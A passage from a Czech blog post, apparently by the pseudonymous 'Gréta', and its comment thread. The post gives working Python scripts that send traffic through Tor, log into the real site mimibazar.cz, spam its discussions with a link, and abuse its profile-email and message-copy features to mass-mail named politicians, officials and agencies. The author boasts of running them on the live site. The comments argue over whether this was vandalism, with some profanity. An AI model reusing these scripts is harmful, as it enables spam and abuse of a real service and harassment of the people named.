#href předposledního odkazu v html komentáře je možnost "odpovědět"
link=comment.find_all("a")[-2]["href"]
#vytáhneme z url query id
id=link.split("=")[1]
print(link)
print(id)
#no a mužem to všechno poslat hurrrrrááááááá!!!! :D
post_data={
"insert": "ok",
"text": random.choice(reakce)+pusinky_url
}
post_params={
"id": id
}
req=session.post("https://www.mimibazar.cz/novy_diskusni_prispevek.php",data=post_data,params=post_params)
print(req.text)
print(req.status_code)
print(url)
print("Hotovo!!!!!!!!!!!!")
return True
time.sleep(5)
print("Mail nepřišel :'(")
register()
A tady je skriptík na posílání psaníček. Jsem si teďko přečetla log a von se nějak divně zašprcnul na tom pentagonu :O :O buďto po mě radovanoj a sumcoj jde CIA nebo mimibazar tu mailovou adresu nevidí jako validní. Na co byste jako vsadili?? :D :D :D :D takže iinfo a ježek zustali bez pusinek :'( Nějakej dobrovolník by jim to moh zkusit znova poslat aby nebyli ošizený, já teď prozatim na mimibazar peču ;D
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import time
import requests
import random
import string
tor_proxy = {
'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'
}
#hlavička z tor browseru
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "en-US,en;q=0.5",
'Accept-Encoding': "gzip, deflate, br",
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'www.mimibazar.cz'
}
#abclinuxu je tam už zakázaný slovo takže jako musíme použít zkracovač :O :O :D :D
url_pusinky="https://miffy.me/HnbR"
text_mailu=" Mimibazar.cz je samá díra a hodnou Grétu co ty dirky našla pořád jenom banujou a když o nich piše a snaží se mamkám z mimibazaru pomoct tak jsou na ni akorát strašně sprostý a ty díry jako vubec neopravujou :'( :'( Proto se na vás jako obracim abyste těm pitomejm hloupejm mamkám vysvětlili že Gréta je jako ta hodná a poslouchaly co jim jako ta hodná Gréta radí a že to teda jako je vostuda že malilililinkatatatatá Grétulilililinka umí víc než jejich placený lopaty ale neni to zase tak děsná vostuda než mit tragikomicky nezabezpečenej web!!!! A za vodměnu si mužete jako upíct sněhový pusinky "+url_pusinky
maily=[]
#kontaktujeme prezidenta a premiéra :O :O :D :D
maily.append(["vratislav.mynar@hrad.cz","Vážený pane Mynáři!!!! Nemoh byste trošku toho svýho syna srovnat jak furt dělá jakože ty stávky?? Ale kuli tomu vám jako nepišu."])
maily.append(["jiri.ovcacek@hrad.cz","Vážený Ovčáčku!!!! Mam děsně tajnej recept pro pana prezidenta!!"])
maily.append(["premier@vlada.cz","Vel'komóžny pán Babiš!!!! "])
#napišeme pirátům. kdo jinej by internetovejm dírám jako měl víc rozumět než piráti?? ;D
maily.append(["ivan.bartos@pirati.cz","Vážený pane bukanýre!!!! "])
maily.append(["richterovao@psp.cz","Vážená mrňavá pirátice!!!! "])
maily.append(["radek.holomcik@pirati.cz","Ty jeden holomku!!!! "])
maily.append(["marcel.kolaja@pirati.cz","Vážená koalo!!!! "])
maily.append(["marketa.gregorova@pirati.cz","Vážená ukulelistko!!!! "])
maily.append(["mikulas.peksa@ep.europa.eu","Vážené pexeso!!!! "])
maily.append(["jakub.michalek@pirati.cz","Míšo!!!! Mam děsně tajnej úkol pro tvý šikanovací suprschopnosti!!!!!!! ale ppppššššššššššššššš!!!!! "])
#jsem náhodou narazila na pirátím blogísku na maily těhletěch dvou senátorů
maily.append(["vaclav.laska@vaclavlaska.cz","Vážená lásko!!!! "])
maily.append(["renata.chmelova@vlasta10.cz","Vážená Chmelařko!!!! "])
#taky napišeme do nukibu a do civilní sekce pentagonu :O :O
maily.append(["cert.incident@nukib.cz","Váženej úřade pro dělání kybernetický bezpečnosti!!!! "])
maily.append(["osd.business.defense@mail.mil","Dear Pentagon!!!! "])
#kontaktujeme reklamní oddělení rootu :D :D
maily.append(["marketing@iinfo.cz","Vážené iinfo!!!! ty tam máš reklamu na kdejakou blbost jako na těch svejch stránkách. Mohlo bys tam jako hodit i reklamu na muj receptík?? "])
maily.append(["obchod@iinfo.cz","Vážené iinfo!!!! ty tam máš reklamu na kdejakou blbost jako na těch svejch stránkách. Mohlo bys tam jako hodit i reklamu na muj receptík?? "])
maily.append(["info@iinfo.cz","Vážené iinfo!!!! ty tam máš reklamu na kdejakou blbost jako na těch svejch stránkách. Mohlo bys tam jako hodit i reklamu na muj receptík?? "])
for m in maily:
m[1]+=text_mailu
#sem málem zapoměla na davida ježka :O :O :D :D
maily.append(["jezekdavid@gmail.com","rytíři Ježku právem překvapení ti posílám uplně supr receptík na sněhoví pusinky!!!!!!!! "+url_pusinky])
for m in maily:
print(m)
def psanicka():
#vyrobíme si objekt session kterej bude držet jakože naše sezení
#potřebujem když se chceme dostat za heslem chráněnej obsah abysme mohli do diskuzí poslat odkaz na náš báječnej recept
session = requests.session()
session.proxies=tor_proxy
session.headers=headers
post_data={
"login": "Gretulinka",
"password": "12345",
"log_in": "ok"
}
req=session.post("https://www.mimibazar.cz/index.php",data=post_data)
print(req.text)
print(req.status_code)
print(req.cookies)
time.sleep(5)
for m in maily:
time.sleep(5)
#nejdřiv si přenastavíme emailovou adresu v nastavení profilu
#ty další kraviny jsou tušim poviný ale možná taky ne
post_data={
"oblast": "Česká Lípa",
"email": m[0],
"edit": "ok",
"send": "UPRAVIT"
}
req=session.post("https://www.mimibazar.cz/uprava_uctu.php",data=post_data)
print(req.text)
print(req.status_code)
time.sleep(5)
#no a pošleme soukromou zprávu fóra nějakýmu dalšímu uživateli s tim že nastavíme kopii na '1'
#aby to poslalo kopii toho posílanýho vzkazu na 'naši' emailovou adresu :D :D :D :D
post_data={
"text": m[1],
"kopie": "1",
"send": "ok"
}
post_params={
"id": "137273" #to id profilu nějaký jiný gréty co tam jako už dávno byla :O :O
}
req=session.post("https://www.mimibazar.cz/novy_vzkaz.php",data=post_data,params=post_params)
print(req.text)
print(req.status_code)
print()
return True
psanicka()
Tiskni
Sdílej:
21.1.2020 20:48
Max | skóre: 72
| blog: Max_Devaine
22.1.2020 10:25
Luboš Doležel (Doli) | skóre: 98
| blog: Doliho blog
| Kladensko
22.1.2020 12:43
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
jenže já už jako nevim jak jim jako pomoct :'( :'(
byste těm matronám taky mohli napsat ať si to jako opravěj mě už to unavuje pomáhat někomu kdo je na mě akorát sprostej :'(
21.1.2020 21:24
Marián Kyral | skóre: 29
| blog: Sem_Tam
| Frýdek-Místek
22.1.2020 12:35
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
zas tak moc jsem je teda jako nezaměstnávala když nato co jim tam x dní pišu že musej opravit kašlaly a ani mi nepoděkovaly pak mi nejdřiv přestaly odepisovat a pak dokonce začaly bejt děsně ošklivý :'( :'(
byste jim to jako mohli jít nějak vysvětlit ale myslim si že zase budou jenom igorovat nebo nadávat :'( já už na ně peču prostě ty mamčině kámošce napišu že s těma matronama neni jako vubec žádná řeč :'( já mam svědomí čistý uďála sem všechno co bylo v mejch silách ;D
22.1.2020 12:41
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
Posílat první písmeno z hesla je samozřejmě blbost, ač při registraci, o ukládání v DB to ale nic nevypovídá.
náhodou to dost vypovídá jakým způsobem k těm heslům jakože přistupujou a jak s nima asi taky jako zacházej. a do celý tý mozajky mi to taky jako sedí a klidně bych se vsadila že mam pravdu ;D
Dobře ti tak píčo.
22.1.2020 12:47
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
jo!!!! dobře ti tak šéfadminko ;D
si asi jako myslíš že mě rozhodilo pár hambatejch slovíček jóóóó?? náhodou jsem jako dost votrlá ;D bys nevěřil co mi matrony psaly za šílený věci :O :O by sis normálně myslel že si to vymejšlim :O :O
22.1.2020 13:18
xkucf03 | skóre: 49
| blog: xkucf03
blogísek s javascriptem
Možnost vkládat JavaScripty měli i na Rootu. Vtipné na tom bylo, že tam tehdy zrovna inzerovali nějaká svoje školení o bezpečnosti webů :-)
22.1.2020 15:39
Jendа | skóre: 78
| blog: Jenda
| JO70FB
22.1.2020 17:14
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
já jenže to myslela dobře :'( :'( :'( :'( ty mi tady zanadáváš a zase si pudeš po svým a za mitutu dvě zapomeneš že nějakej mimibazar existuje. já to snima zkoušim řešim už čtrnáct dní!!!!!!!!!!! :'( :'( si to běž tam klidně zkusit jako schválně jak dloho bys to vydržel jim pomáhat myslim že ani ne den :'( a těch použitejch botů bylo jenom pár a házela jsem tam celkem neutrální obsah jakože ty svý sněhový pusinky a přitom bych to co vám tady ukazuju šlo použít mnohem líp a taky sem možná nepišu všecko co tam je blbě ale já už na to kašlu di to tam řešit třeba ty :'( :'(
23.1.2020 01:42
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Všichni dávno vědí, že je to Amigapower.
23.1.2020 03:41
Jendа | skóre: 78
| blog: Jenda
| JO70FB
23.1.2020 20:56
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Nechápu proč se chováš tak histericky Jendo.Já si myslím, že zpětná vazba je třeba. Tohle zrovna bylo fakt dětinské a i když ne vysloveně destruktivní vůči webu, tak vůči jeho uživatelům ano. Web a obecně celá lidská společnost stojí do velké míry stojí na tom že lidé se nechovají jako zmrdi. Vandalismus zůstane vandalismem, i když si Gréta a pár dalších asi myslí jakou tím prokazují úžasnou bezpečnostní kritiku a pomoc.
Pokud se ti to nelíbí tak začni něco zajímavého psát ty místo vyřvávání vulgarit na ostatní.Jenda toho dělá docela dost zajímavého, jen musíš koukat na brmwiki.
Budu upřímný, jediný co je na abc zajímavý poté co odešel Bystroushaak je komix a Greta.Já jsem „neodešel“, jen toho vydávám v češtině poslední dobou minimum a anglické články sem neposílám, protože reakce byly vesměs negativní a dementní. Časem sem zase něco hodím, až budu mít něco česky. Můj osobní názor na aktuální stav abclinuxu je vesměs takový, že jeho užitečnost pro mě vypršela. Většinu interakcí dostávám jinými kanály a s lidmi se kterými mě tu bavilo diskutovat jsem ve spojení přímo. Zdejší tolerance k trolení a spamování diskuzí píčovinama mi přijde přehnaná a destruktivní, redakční systém stojí za hovno, spousta lidí, které jsem osobně potkal třeba v práci, co sem dřív chodili, ani nevěděli, že tu jsou blogy. Když se podívám i na ty nejčtenější blogy tady, tak na vlastním blogu tyhle počty dávám za den, co se tady naakumuluje za měsíc. Diskuze tu jsou sice vesměs živější, ale poslední dobou je tu zvykem, že cca jedna pětina všeho pod libovolným blogem jsou toxické sračky. Takže ani moc není proč sem nadále psát a vystupovat tady. Poslední dobou jsme několikrát s kralykem a frantou řešili, že by bylo fajn mít nějakou platformu na dlouhodobější technické diskuze, pravděpodobně invite-only, ale zatím z toho nic nebylo. Máte někdo nějaké nápady? Zkoušel jsem discourse, ale moc mi to nesedlo.
reakce byly vesměs negativní a dementní
Jsi fakt píča
27.1.2020 14:36
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
27.1.2020 15:21
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
4.2.2020 11:51
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
lišáčku jenže vony mě jako fakt vůbec neposlouchaly :'( :'( ty jsou tak pitomí že by si myslely že to tam jako všecko pišu ručně neukázat jim zdrojáčky :O :O :D :D :'( :'(
mi jako připadá horší šlohnout profil nebo ukázat hesla nebo tak něco než udělat stračně moc komentů s rceptem na sněhový pusinky ;D a si myslim že grétobot stačil už to asi vopravujou takže win hele ;D
22.1.2020 17:33
otasomil | skóre: 39
| blog: puppylinux
Bherzet se zase nudil?
12.2.2020 18:02
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
jojo a taky by jako potřebovaly vomluvenky na čédinu ;D
už si doma zišťoval jestli ty tvý blance v práci nezbejvaj nejaký omluvenky navíc?????? třeba nějaká taková u který hrozí že bude expirovat nikdo si ji určitě už jako neveme ani uklízečka na zabalení chleba se sádlem. by byla škoda omluvenku jen tak skartovat když muže ještě posloužit dobrý věci ne??
Ale no tak, vždyť se toho tolik nestalo. Podle printscreenů byl spambot aktivní někdy 4.1. blog Gréta zveřejnila až 21.1. večer. Šestnáct dní je dost dlouhá doba na opravy všech zmíněných chyb. Pro člověka, který se nemusí stydět za to že se webařinou živí, počítám tak deset minut na opravu jedné, pro matlala půl hodiny... No, a jestli se provozovatelky k opravám neměly, nebo se je dokonce pokoušely "opravit" nějakou formou nátlaku na naši malou oznamovatelku aby byla zticha a vypadla, bylo zcela na místě chyby zveřejnit. Nepochybuji, že to Gréta myslela dobře a to je pro mne rozhodující, i když forma možná trochu pokulhává za úmyslem
Ale! Kolik z Vás pohoršených moralistů si dalo tu práci hledat a nahlašovat na mimibazaru chyby? Nebo tady jenom vulgárně nadáváte jediné, která se o to pokusila? A výmluvy druhu "komerční closed-source projekt", "nepoužívám", "co mi je po tom" nežeru. Proč si tedy čtete zápis který má mimibazar v názvu? Opravdu Vám na uživatelích toho bazaru tak záleží, jako třeba právě Grétě? Nebo Vám prostě dělá dobře dirty talk s puberťačkou a nemáte zábrany se do svého fetiše pustit okamžitě jakmile vycítíte byť i nepatrný zlomeček příležitosti využít svoji převahu "autority"? Je opravdu tohle ta správná "zpětná vazba"?
Já bych pouze milou Grétu mírně pokáral za obtěžování uživatelů spambotem, uživatelé jsou prostě třetí strana a není hezké brát si je za rukojmí ve sporu do kterého nevidí, i když je to třeba velká švanda (viz Turingův test ). To ale byla nejspíše od Gréty jenom taková... taková... Prosím Vás, jak se říká klukovině když ji provede holka? A nechci slyšet nic, co začíná na "p"! 
25.1.2020 12:50
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Ale no tak, vždyť se toho tolik nestalo. Podle printscreenů byl spambot aktivní někdy 4.1. blog Gréta zveřejnila až 21.1. večer. Šestnáct dní je dost dlouhá doba na opravy všech zmíněných chyb. Pro člověka, který se nemusí stydět za to že se webařinou živí, počítám tak deset minut na opravu jedné, pro matlala půl hodiny... No, a jestli se provozovatelky k opravám neměly, nebo se je dokonce pokoušely "opravit" nějakou formou nátlaku na naši malou oznamovatelku aby byla zticha a vypadla, bylo zcela na místě chyby zveřejnit. Nepochybuji, že to Gréta myslela dobře a to je pro mne rozhodující, i když forma možná trochu pokulhává za úmyslemTady předpokládáš, že všichni jsou programátoři a všichni mají volný čas na to opravovat chyby. Reálně to mohlo stát částku v řádu tisíců až desítek tisíců korun (podle toho kolik si programátor naúčtuje).
Ale! Kolik z Vás pohoršených moralistů si dalo tu práci hledat a nahlašovat na mimibazaru chyby? Nebo tady jenom vulgárně nadáváte jediné, která se o to pokusila? A výmluvy druhu "komerční closed-source projekt", "nepoužívám", "co mi je po tom" nežeru. Proč si tedy čtete zápis který má mimibazar v názvu? Opravdu Vám na uživatelích toho bazaru tak záleží, jako třeba právě Grétě? Nebo Vám prostě dělá dobře dirty talk s puberťačkou a nemáte zábrany se do svého fetiše pustit okamžitě jakmile vycítíte byť i nepatrný zlomeček příležitosti využít svoji převahu "autority"? Je opravdu tohle ta správná "zpětná vazba"?Představ si, kdyby se tohle stalo irl. Někdo ti autem najede do plotu, nebo ho přeleze a pošlape ti zahradu. A ostatní ti pak řeknou akorát že jsi měl mít silnější plot, nebo ostnatý drát a hlídače, když chceš mít zahradu, to dá přece rozum. Vsadím se, že někde je zloděj, který si to omlouvá tím, že lidi přece mají mít bezpečnostní dveře, co se nedají otevřít lockpickem, když nechtěj aby jim to ostatní vykrádali. V naší společnosti platí nějaké společenské dohody, mezi které patří například to, že vandalizmus se netoleruje, když je prováděn proti vůli majitele. Jedna věc je najít a nahlásit chybu, druhá obecně security komunitou považovaná za nemorální je jít a tu chybu záměrně zneužít ke spamu a otravování uživatelů. Úplně mimo je pak sepsat o tom blog a ještě se tím chlubit.
Já bych pouze milou Grétu mírně pokáral za obtěžování uživatelů spambotem, uživatelé jsou prostě třetí strana a není hezké brát si je za rukojmí ve sporu do kterého nevidí, i když je to třeba velká švanda (viz Turingův testJe to dětinské. U dětí by se to dalo tolerovat, protože nemají vlastní rozum. U dospělého člověka se většinou očekává, že už má nějaké pochopení akceptovatelného chování.
25.1.2020 16:54
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Tady předpokládáš, že všichni jsou programátoři a všichni mají volný čas na to opravovat chyby. Reálně to mohlo stát částku v řádu tisíců až desítek tisíců korun (podle toho kolik si programátor naúčtuje).Ale za tohle Gréta jakožto pouhý „posel špatných zpráv“ („máte tam díru“ -- ta tam byla nezávisle na Grétě) nemůže, naopak je dobře, když to někdo nahlásí, než kdyby někdo příštích pět let data tajně tahal (samozřejmě data z mimibazaru nejsou tak zajímavá jako z nějakých firem, bank a úřadů, ale stejně). Tohle mi přijde dobré a taky bych to udělal. Dokonce bych měl i pochopení kdyby si přes tu chybu fakt třeba nějaká data ukradla a třeba dala na internet anonymizovaný wordlist. A taky schvaluji zveřejnění pokud ten, komu chybu reportuješ, na ni kašle, nebo se tě snaží nějak vydírat atd. Co mě fakt naprosto vadí je to spamování, které navíc tu díru nějak extra nevyužívá - a i kdyby tam dali kapču, tak to nepomůže, protože jsou služby na její vyřešení za pár halířů.
Představ si, kdyby se tohle stalo irl. Někdo ti autem najede do plotu, nebo ho přeleze a pošlape ti zahradu. A ostatní ti pak řeknou akorát že jsi měl mít silnější plot, nebo ostnatý drát a hlídače, když chceš mít zahradu, to dá přece rozum.Z nějakého důvodu je ve společnosti konsenzus takový [1] [2], že se u fyzických systémů nepožaduje odolnost proti aktivnímu útočníkovi, zatímco u počítačových ano. Taky mě trochu překvapilo, když jsem si to poprvé uvědomil (přečtením toho článku na erratasec), že to tak vlastně mám. Nevím, asi to souvisí se snadností útoku na počítačový systém na internetu, kdy to může udělat masově kdokoli z celého světa, zatímco u fyzických je to složitější?
25.1.2020 17:43
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Ani v jednom případě to nejspíš nebude příliš legální.To je právě ten rozdíl. Zákon vám zakazuje ublížit někomu, kdo se aktivně pokouší vniknout na váš pozemek. Respektive teoreticky je to šedá zóna, ale prakticky vám to ohodnotí soud jako nepřiměřenou obranu. Narozdíl od toho počítačový systém se může bránit, aniž by někomu uškodil. A jinak odolnost proti aktivnímu útočníkovi je vyžadována, pokud například chcete dostat něco z pojistky. Pokud vám něco ukradnou a zjistí se, že útočník nemusel překonávat překážky (např. brána byla otevřená a věc byla za ní), pojišťovna vám dá kulový.
26.1.2020 23:38
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Narozdíl od toho počítačový systém se může bránit, aniž by někomu uškodil.Teď jsem si přečetl, že se pod aktivní obranou zdá se myslí i blokování někoho na firewallu… Já si pod tím představil výhradně to čemu se říká hackback. Ale to můžeš v IRL světě dělat taky, třeba ke dveřím do bytu typicky pouštíš jenom ty, co mohou do domu. A stejně jako v počítačovém světě to jde různými způsoby obcházet.
A jinak odolnost proti aktivnímu útočníkovi je vyžadována, pokud například chcete dostat něco z pojistky. Pokud vám něco ukradnou a zjistí se, že útočník nemusel překonávat překážky (např. brána byla otevřená a věc byla za ní), pojišťovna vám dá kulový.OK, dobrá připomínka, beru na vědomí. Ale tohle není ten případ, který jsem citoval (Někdo ti autem najede do plotu, nebo ho přeleze a pošlape ti zahradu.), že ne?
Ale tohle není ten případ, který jsem citovalNe, to není, to bylo jen tak navíc.
26.1.2020 23:42
Jendа | skóre: 78
| blog: Jenda
| JO70FB
XSS - ano. Spamování - jak?Narážel jsem na to opravování chyb, ochranu před nežádoucími příspěvky už beru jako funkci navíc.
25.1.2020 18:19
Fluttershy, yay! | skóre: 92
| blog:
Reálně to mohlo stát částku v řádu tisíců až desítek tisíců korun (podle toho kolik si programátor naúčtuje).Víš, co je paradoxní? Pseudonym Gréta tu od začátku vystupuje s dezinformační agendou a mj. patičkou plnou odkazů na konspirační weby popírající realitu. A pak začne „vandalizovat“ fórum ze skupiny dezinformačních webů popírajících realitu (CNC uhlobaronů Křetínského a Tkáče). Jestli to fakt má stát stovky tisíc, z hlediska konsekvencialismu docela úspěšný občanský aktivismus.
4.2.2020 11:40
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
mimibazar z toho jako výde mnohem silnější a mocnější než kdy bejval ;D
25.1.2020 23:39
Bedňa | skóre: 34
| blog: Žumpa
| Horňany
Někdo ti autem najede do plotu, nebo ho přeleze a pošlape ti zahraduZabudol si na ústavu ktorá ti vo všetkých civilizovaných krejinách garantuje súkromné práva a je jasne dané, že sa ti nikto beztrestne nemôže nabúrať do plota a kľudne sa u teba prechádzať. Dúfam, že sa to nijak vďaka dnešnej online dobe nijak meniť nebude. V momente ako opustíš túto bezpečnú zónu si vystavený len zákonom z dielne parlamentu a ktoré väčšinou stoja za prd. Mať dnes stránku kde sa dá vložiť JavaScript tak to je ako parkovať pred Tescom s kľúčkmi v spínačke. Nie nemám s nimi žiadny súcit, stačí pred výstup pstaviť frontend ktorý všetko premení na plain text a nech tam hocikto vloží skript tak to bude vidieť ako plaintext. Ak chce niekto za toto tisíce, tak fajn, ja som také šťastie nemal.
26.1.2020 00:35
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Zabudol si na ústavu ktorá ti vo všetkých civilizovaných krejinách garantuje súkromné práva a je jasne dané, že sa ti nikto beztrestne nemôže nabúrať do plota a kľudne sa u teba prechádzať. Dúfam, že sa to nijak vďaka dnešnej online dobe nijak meniť nebude.Pokud z ústavy odvozuješ práva k plotu, tak stejně dobře můžeš odvodit práva k webu. Co se týče zákonů, tak ty myslí na oboje.
Nie nemám s nimi žiadny súcit, stačí pred výstup pstaviť frontend ktorý všetko premení na plain text a nech tam hocikto vloží skript tak to bude vidieť ako plaintext. Ak chce niekto za toto tisíce, tak fajn, ja som také šťastie nemal.A až ti někdo vypwní skrz nějaký bug tvůj web, tak to bude taky určitě v pohodě, co? Narážím tu na to, že úplně všechno jde vandalizovat. Z hlavy mě napadají desítky způsobů, jak to strhnout na hromádku cihel i tady. Kdybych se trochu snažil, tak to tu můžu udělat naprosto nepoužitelné pro všechny. To ti přijde taky ok? Je tu minimálně několik chyb neošetřeného vstupu, jak se kdysi ukázalo s kauzou toho trotla co chtěl aby mu smazali blog, tak tím spamoval poradnu. Mimo neošetřených vstupů tu můžu přetěžovat jednotlivé funkcionality, takže například nepůjdou použít, protože server bude vytížen. Vím tu o minimálně jednom deadlocku, který znemožňuje funkcionalitu. Můžu napsat několik botů, které to tu budou tak zasírat že prostě přes noc dojde místo na disku. Můžu útočit na hesla ostatních, a nebo i na správce, skrz celou paletu útoků. Četl jsi zdrojáky abclinuxu? Kolik věcí tu má komplexitu O(n^2) a je ovlivnitelná uživatelskými vstupy? To ani nepočítám sociální útoky, kde jde prostě otravovat život lidem různými boty, kteří se budou tvářit jako legitimní uživatelé a chovat jako idioti. Kde máš tu hranici, kdy je to pro tebe ještě ok a kdy už ne? Proč jí máš zrovna tam? Není to alibismus? XSS ti vadí, protože by mělo být ošetřeno. Co všechno dalšího ti vadí a nebo nevadí, protože tohle jde škálovat do nekonečna a v podstatě považovat po lidech aby vytvářeli dokonalé systémy. Proč to chceš ve virtuálním světě, když v tom reálném je každému jasné, že to z principu nejde?
26.1.2020 01:09
Bedňa | skóre: 34
| blog: Žumpa
| Horňany
Pokud z ústavy odvozuješ práva k plotu, tak stejně dobře můžeš odvodit práva k webu. Co se týče zákonů, tak ty myslí na oboje.To je auto s kľúčikmi v spínačke pred Tescom, nikto ťa tam nenútil ísť, je to tvoja voľba.
A až ti někdo vypwní skrz nějaký bug tvůj web..............Maximálne zožere RAMku a bude nedostupný. Ochrana užívateľov a čiže aj webu je úplne triviálna. Nejaký nástrel som písal aj tu v blogu. Ako som písal, prv než niečo vyleze z webu, tak stačí triviálny frontend ktorý všetko vypľuje ak plain text. Keď chcem robiť niečo čomu nerozumiem, tak musím očakávať problémy, to k tomu neoddeliteľne patrí.
... alebo sloboda názoru, slova... tá platí len pre tých, ktorí sú ideologicky kompatibilní s mienkotvorcami... alebo robia v Levoči komparz kiskoidom
Mne hlavně trápilo jakým hrubým způsobem jste jí to napsali, především když nevznikla vůbec žádná patrná škoda. Navíc, jen těžko můžeš někoho kárat za nevhodné chování, když sám máš máslo na hlavě.
Reálně to mohlo stát částku v řádu tisíců až desítek tisíců korun (podle toho kolik si programátor naúčtuje).
Kdo chce vydělávat, musí chtít i investovat, tak jednoduše to prostě chodí. No, a kdyby měli hluboko do kapsy tak se tam přinejmenším motala Gréta, třeba její potenciál šlo lépe využít, než si z ní udělat škodnou. Ale hlavně - jestli toto má být konečná podoba nových stránek, tak bych to viděl spíše na reklamaci, podobně jako trekker.
Reklamace by nestála nic, Gréta hádám omluvu a možná ještě pár vyřešených domácích úkolů na češtinu navrch
Představ si, kdyby se tohle stalo irl
Stávat se to in real life tak mám obden poštovní schránku plnou reklamních letáků. Počkat, vlastně mám!
Vzato relativně k tomu, co všechno s tím bazarem mohla Gréta udělat to žádný vandalismus nebyl, navíc když zohledníš její přínos v hlášení chyb. Pravý Vandal by se rozhodně takto nechoval, za ním by z mimibazaru zbylo pouze spáleniště a moře slz zoufalých uživatelek Takovou moc měla milá Gréta v rukou a jak s ní naložila? Spamovala v diskuzích recept na sněhové pusinky. To není destruktivní chování.
A napadlo tě, že se určitého vandalismu možná dopouštíš právě teď i ty? Nelze se automaticky spolehnout na to, že si Gréta z tvých příspěvků vezme "Jéje, moudrý Bytroušák má pravdu! Už to nikdy neudělám", může to totiž klidně mít zcela opačný efekt. V lepším případě příště kolem nalezené chyby jen tak projde, protože pomáhat se přeci nevyplácí, a už vůbec ne sprosťákům a suchoprdům z okolí FOSS, v horším případě si z toho dokonce může vzít "Když mě všichni mají za p***, tak se tak budu i chovat". A kus zodpovědnosti budeš mít i ty!
Je to dětinské
Ano, bylo to takové roztomilé . Jestli bych byl zodpovědný za takto děravé stránky aukčního serveru a přitom IT technologiím absolutně nerozuměl, byl bych za hlášení a popis chyb ochotný klidně zaplatit stejnou cenu jako mimibazar a stát se další obětí otřesného "pusinkového útoku". Ale dětinské mi spíše připadá hojit si na Grétě nabubřelé ego, každý nějak začínal a dělal chyby, nebuď zbytečně zlý, z toho nikdy nemůže vzejít nic dobrého.
26.1.2020 21:32
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Mne hlavně trápilo jakým hrubým způsobem jste jí to napsali, především když nevznikla vůbec žádná patrná škoda.Hrubým způsobem jí to napsal Jenda, tak nás laskavě neházej do jednoho pytle. Jinak mi přijde zábavné, jak se v tobě probouzí protektivita jen na základě toho že někdo použije ženský avatar. Možná by sis jí měl substituovat s tlustým čtyřicátníkem, pak by se ti třeba zmenšilo emoční zkreslení. Je ti jasné, že to není skutečná Gréta, že je to jen falešný humorný profil? Není z poolu potenciálních samic, nezaslouží si tvojí podvědomou protekci. Zcela účelově tě zneužívá. Lepší? Když nad tím tak přemýšlím, tak nějak lituji, že tu nemám profil jako holka, tohle je dobrý psychologický hack.
Navíc, jen těžko můžeš někoho kárat za nevhodné chování, když sám máš máslo na hlavě.Máslo na hlavě za destruktivní chování fakt nemám. Pokud myslíš ten trackovací pixel tady, tak o tom jsem mluvil zcela veřejně od samého začátku (doslova to celé vzniklo na základě místní diskuze o tom, jak je těžké trackovat uživatele, kam jsem psal že není, že se to dá dělat pixelem a může to dělat kdokoliv z uživatelů abclinuxu) a funkčnost to nikomu neomezilo.
Stávat se to in real life tak mám obden poštovní schránku plnou reklamních letáků. Počkat, vlastně mám! Vzato relativně k tomu, co všechno s tím bazarem mohla Gréta udělat to žádný vandalismus nebyl, navíc když zohledníš její přínos v hlášení chyb. Pravý Vandal by se rozhodně takto nechoval, za ním by z mimibazaru zbylo pouze spáleniště a moře slz zoufalých uživatelekSecurity komunita má poměrně jasně daný kodex chování. Tam například patří, že je ok hledat chyby a reportovat je, ale není ok spamovat, nebo ničit funkčnost stránky. V případě že nereagují, tak je v pohodě zveřejnit článek o chybě, i když ideálně s ne úplně kompletními informacemi, aby člověk předešel tomu že to budou zneužívat script kiddies.
Ano, bylo to takové roztomiléWtf? Můžeš mi prosímtě vysvětlit co je na odsouzení útoku na webové stránky za nabubřelé ego? Upřímně mě to zajímá. Přijde mi to jako prázdné kecy, když to nepodložíš žádnou další argumentací a používáš to v podstatě jen jako urážku. Jinak roztomilé ti to přijde, jen protože tohle nebylo cíleno na tebe. Osobně doufám, že tohle budeš mít na paměti, až se tohle stane i tobě a budeš mít stejnou benevolenci. Například až ti někdo sundá stránky které používáš k podnikání. Nebo ti nějaký ransomware sežere disk. Fakt je, že děravé je úplně všechno. Veškerý software co používáme obsahuje chyby a chyby neošetřeného vstupu jsou vůbec ty nejčastější. Kde chceš nakreslit hranici? Stačí ti u XSS? Nebo u SQLi? Buffer overflow? Co takhle timing, a nebo obecně side-channel útoky? Například celý internet stojí jen na důvěře a je triviální ho likvidovat. Budeš se taky tvářit jako že to bylo roztomilé, až zase někdo vyexportuje vadné BGP (se sněhovýma pusinkama) a vypne ti net na půl dne?
